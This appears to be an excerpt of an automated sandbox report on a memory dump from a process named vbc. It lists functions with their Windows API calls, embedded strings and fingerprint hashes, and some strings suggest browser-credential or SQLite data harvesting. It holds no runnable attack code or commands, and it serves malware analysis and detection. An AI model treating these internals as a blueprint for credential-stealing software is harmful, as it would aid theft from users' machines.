                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                        • String ID: -journal$-wal
                                                                                                                                                                        • API String ID: 438689982-2894717839
                                                                                                                                                                        • Opcode ID: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
                                                                                                                                                                        • Instruction ID: 74a332e22f0b607a266e47b82b9d8ba1ef45136a3b8be849caa08d0d2b66e2c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
                                                                                                                                                                        • Instruction Fuzzy Hash: DCA1C071A0464AEFDB14DF64C8417DEBBB0FF04314F14826EE46997381D738AAA4CB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004050AF Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405153
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405166
                                                                                                                                                                        • GetDlgItem.USER32 ref: 0040517B
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405193
                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 004051AF
                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 004051C4
                                                                                                                                                                          • Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
                                                                                                                                                                          • Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90
                                                                                                                                                                        • SendDlgItemMessageW.USER32 ref: 004051DC
                                                                                                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004052ED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$Dialog$MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3975816621-0
                                                                                                                                                                        • Opcode ID: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
                                                                                                                                                                        • Instruction ID: 2cde12ba5927d4bde9809f16a4ff1e8400ea1fd37873b15a8c1cc8d9e94e8744
                                                                                                                                                                        • Opcode Fuzzy Hash: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
                                                                                                                                                                        • Instruction Fuzzy Hash: 6961B030600B05ABDB31AF25CC86B6B73A5FF50324F00863EF515AA6D1D778A951CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00443EEF Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00443F6F
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00443F84
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00443F99
                                                                                                                                                                          • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
                                                                                                                                                                          • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
                                                                                                                                                                          • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                        • API String ID: 1214746602-2708368587
                                                                                                                                                                        • Opcode ID: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
                                                                                                                                                                        • Instruction ID: 597a29036d5ddd155e475e5b18437da6987c3908216f6d337c400390a4fd9aac
                                                                                                                                                                        • Opcode Fuzzy Hash: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
                                                                                                                                                                        • Instruction Fuzzy Hash: A54135758087018AF7309EA5D94076773D8DB84B26F208D3FE56AE36C1EEBCE958411E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004052FD Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2313361498-0
                                                                                                                                                                        • Opcode ID: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
                                                                                                                                                                        • Instruction ID: 5d7335f69ca4f594208563f7014043d8df0e1bea6ea55c180c5050c90dc7a29e
                                                                                                                                                                        • Opcode Fuzzy Hash: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
                                                                                                                                                                        • Instruction Fuzzy Hash: E931A4B1500A01AFEB14AF69C98691AB7A4FF04354710453FF545E7691DB78EC90CF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040547A Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClientRect.USER32 ref: 00405491
                                                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 004054A9
                                                                                                                                                                        • GetWindow.USER32(00000000), ref: 004054AC
                                                                                                                                                                          • Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744
                                                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 004054B8
                                                                                                                                                                        • GetDlgItem.USER32 ref: 004054CE
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00405517
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2047574939-0
                                                                                                                                                                        • Opcode ID: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
                                                                                                                                                                        • Instruction ID: ee080d675ccdbf70b04d6128f25a7e8090f7ef981af0433368dbc7d1a9e2eb74
                                                                                                                                                                        • Opcode Fuzzy Hash: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
                                                                                                                                                                        • Instruction Fuzzy Hash: AB218071690B0977EA0137229D86F6B366DEF96714F10003AFA007B2C2EEBA580245AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407F32 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EmptyClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F3A
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407F47
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040F25C,-00000210), ref: 00407F57
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00407F64
                                                                                                                                                                        • memcpy.MSVCRT ref: 00407F6D
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00407F76
                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00407F7F
                                                                                                                                                                        • CloseClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F8F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1213725291-0
                                                                                                                                                                        • Opcode ID: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
                                                                                                                                                                        • Instruction ID: 8669bfd28652b36aabcc6f95cbac9fd564b8d5c2b1f3dd921f492192fb7780cb
                                                                                                                                                                        • Opcode Fuzzy Hash: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
                                                                                                                                                                        • Instruction Fuzzy Hash: E8F0E03B600A157FD6103BF0BC4CF5B776CDBC6B96B01013AF905D6252DE68580487B9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406FCE Relevance: 11.4, APIs: 9, Instructions: 106stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00406FF4
                                                                                                                                                                        • memset.MSVCRT ref: 00407008
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
                                                                                                                                                                        • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040709D
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4248099071-0
                                                                                                                                                                        • Opcode ID: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
                                                                                                                                                                        • Instruction ID: 3602a3695f0633691502e701aaeaa3678f077821d3d25540d64766a890a16dc7
                                                                                                                                                                        • Opcode Fuzzy Hash: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
                                                                                                                                                                        • Instruction Fuzzy Hash: A6412D7590021DAFDB20DF64CC80FDAB3FCBB09344F0485AAB559D2141DA34AB448F64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404F3A Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00404F51
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404F6A
                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404F77
                                                                                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404F83
                                                                                                                                                                        • memset.MSVCRT ref: 00404FE7
                                                                                                                                                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 0040501C
                                                                                                                                                                        • SetFocus.USER32(?), ref: 004050A2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4281309102-0
                                                                                                                                                                        • Opcode ID: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                        • Instruction ID: 4a7769bfe8dd657eebcefc70b29ecb6e887c437cb47c08b61b0609965a717ddb
                                                                                                                                                                        • Opcode Fuzzy Hash: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B415975900219BBDB20DF95CC89EAFBFB9EF04754F1040AAF508A6291D3749A90CFA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D26F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintfwcscat
                                                                                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                        • API String ID: 384018552-4153097237
                                                                                                                                                                        • Opcode ID: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                        • Instruction ID: 8f1261d6e50b9fc48a8d4c2a01cb2efc3c1dd918db621c17a7092c97f5fd87e6
                                                                                                                                                                        • Opcode Fuzzy Hash: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E318D31900209EFDF04EF54CC86AAE7F75FF44320F1001AAE905AB2E2C738AA55DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B974 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                        • String ID: 0$6
                                                                                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                                                                                        • Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                        • Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004086FA Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
                                                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
                                                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00408767
                                                                                                                                                                        • wcscat.MSVCRT ref: 00408774
                                                                                                                                                                        • wcscat.MSVCRT ref: 00408783
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00408795
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1331804452-0
                                                                                                                                                                        • Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                        • Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
                                                                                                                                                                        • Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D86C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • <%s>, xrefs: 0040D8E2
                                                                                                                                                                        • <?xml version="1.0" ?>, xrefs: 0040D8B8
                                                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                                                                                        • Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
                                                                                                                                                                        • Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408806 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                        • String ID: %2.2X
                                                                                                                                                                        • API String ID: 2521778956-791839006
                                                                                                                                                                        • Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                        • Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00443C91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443CA6
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CB5
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CC6
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443CD5
                                                                                                                                                                        • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00443CEF
                                                                                                                                                                          • Part of subcall function 0040807E: wcslen.MSVCRT ref: 00408085
                                                                                                                                                                          • Part of subcall function 0040807E: memcpy.MSVCRT ref: 0040809B
                                                                                                                                                                          • Part of subcall function 00408148: lstrcpyW.KERNEL32(?,?), ref: 0040815D
                                                                                                                                                                          • Part of subcall function 00408148: lstrlenW.KERNEL32(?), ref: 00408164
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                        • String ID: \StringFileInfo\
                                                                                                                                                                        • API String ID: 393120378-2245444037
                                                                                                                                                                        • Opcode ID: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                        • Instruction ID: 4bcd922806ee50f9cb47b7d9b2cc513868d30f54de93413914084f8cb2eb3ca3
                                                                                                                                                                        • Opcode Fuzzy Hash: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
                                                                                                                                                                        • Instruction Fuzzy Hash: B801847290020DA6EF11EAA1CC45EDF777CAB44308F1005B7B654F2052EA3CDB869B58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B7A3 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                        • API String ID: 999028693-502967061
                                                                                                                                                                        • Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
                                                                                                                                                                        • Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
                                                                                                                                                                        • Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0042A67D Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                        • API String ID: 2221118986-1606337402
                                                                                                                                                                        • Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
                                                                                                                                                                        • Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413117 Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
                                                                                                                                                                        • memset.MSVCRT ref: 004131B4
                                                                                                                                                                        • memset.MSVCRT ref: 004131C4
                                                                                                                                                                          • Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A
                                                                                                                                                                        • memset.MSVCRT ref: 004132AF
                                                                                                                                                                        • wcscpy.MSVCRT ref: 004132D0
                                                                                                                                                                        • CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3300951397-0
                                                                                                                                                                        • Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
                                                                                                                                                                        • Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
                                                                                                                                                                        • Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417EE5 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00417F17
                                                                                                                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00417F25
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 00417F6B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
